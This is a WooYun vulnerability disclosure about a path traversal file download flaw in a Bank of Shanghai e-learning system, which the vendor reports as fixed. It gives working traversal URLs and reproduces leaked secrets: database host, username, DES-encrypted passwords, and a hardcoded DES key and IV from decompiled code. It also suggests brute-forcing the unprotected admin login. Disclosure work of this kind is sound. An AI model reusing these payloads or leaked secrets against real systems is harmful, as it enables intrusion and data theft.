当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139740

漏洞标题:上海银行某系统任意文件下载导致敏感信息泄露

相关厂商:上海银行

漏洞作者: 路人甲

提交时间:2015-09-08 15:36

修复时间:2015-10-26 17:34

公开时间:2015-10-26 17:34

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-08: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经确认,细节仅向厂商公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

详细说明:

详细说明见漏洞证明。

漏洞证明:

上海银行网上学习平台(系统URL地址:http://learning.bankofshanghai.com/)存在任意文件下载漏洞,导致敏感信息泄露。
系统首页为,确定上海银行系统

1银行首页.png


举例说明:
1.直接访问如下URL,下载wis18.jar包
http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../WEB-INF/lib/wis18.jar

源代码包下载.png


可以对该jar包进行反编译获取源代码。
2.数据库配置文件下载,直接访问如下URL
http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../system/config/ds.xml
包含数据库主机IP、用户名、密码等

<?xml version="1.0" encoding="utf-8"?>
<datasource>
<db>oracle</db>
<flag>1</flag>
<ip>11.1.21.20</ip>
<port>1521</port>
<databasename>boslearn</databasename>
<connection-url>jdbc:oracle:thin:@11.1.21.20:1521:boslearn</connection-url>
<driver-class>oracle.jdbc.driver.OracleDriver</driver-class>
<username>boslearn</username>
<password>{DES}mwHgQpaA/2LKq5ZGRFXbAQ==</password>
<idleconnectiontestperiod>60</idleconnectiontestperiod>
<idlemaxage>240</idlemaxage>
<minconnectionsperpartition>5</minconnectionsperpartition>
<maxconnectionsperpartition>10</maxconnectionsperpartition>
<partitioncount>1</partitioncount>
<acquireincrement>10</acquireincrement>
<preparedstatementcachesize>100</preparedstatementcachesize>
<statementscachedperconnection>30</statementscachedperconnection>
<releasehelperthreads>3</releasehelperthreads>
<initsql>select * from dual</initsql>
</datasource>


3.管理员配置文件,用户名admin,密码是DES加密的
http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../system/config/manauser.xml

<?xml version="1.0" encoding="utf-8"?>
<system>
<username>admin</username>
<password>{DES}XbFZLpK0+6I=</password>
</system>


该系统使用了DES加密,经过一番寻找,在jar包反编译后的com\wis18\core\util目录中找到了EncryptAndDecrypt.java文件,该文件该文件包含秘钥strDesKey

public static void main(String[] args) {
try {
System.out.println(desEncrypt("的发生地"));
System.out.println(desEncrypt("的的的"));
System.out.println(desEncrypt("的的"));
System.out.println(desEncrypt("的"));
}
catch (Exception ex)
{
ex.printStackTrace();
}
}
static
{
try
{
encipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
decipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
String strDesKey = "[email protected]/-GOod=";
String strDesIV = "No1&>AllSys=";

BASE64Decoder b = new BASE64Decoder();
desKeySpec = new DESKeySpec(b.decodeBuffer(strDesKey));
SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("DES");
secretKey = keyFactory.generateSecret(desKeySpec);
iv = new IvParameterSpec(b.decodeBuffer(strDesIV));
encipher.init(1, secretKey, iv);
decipher.init(2, secretKey, iv);
} catch (Exception e) {
e.printStackTrace();
}
}
}


有了秘钥是不是可以去破解下后台管理员的密码呢,试了下了没解密成功,
但是经过测试该系统后台登录无验证,当然可以试试暴力破解了。
但该系统后台登录地址为:http://learning.bankofshanghai.com/wis18/login/manalogin.jsp

后台.png


OK,问题证明到此。

修复方案:

你们是行家。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-09-11 17:33

厂商回复:

已修复

最新状态:

暂无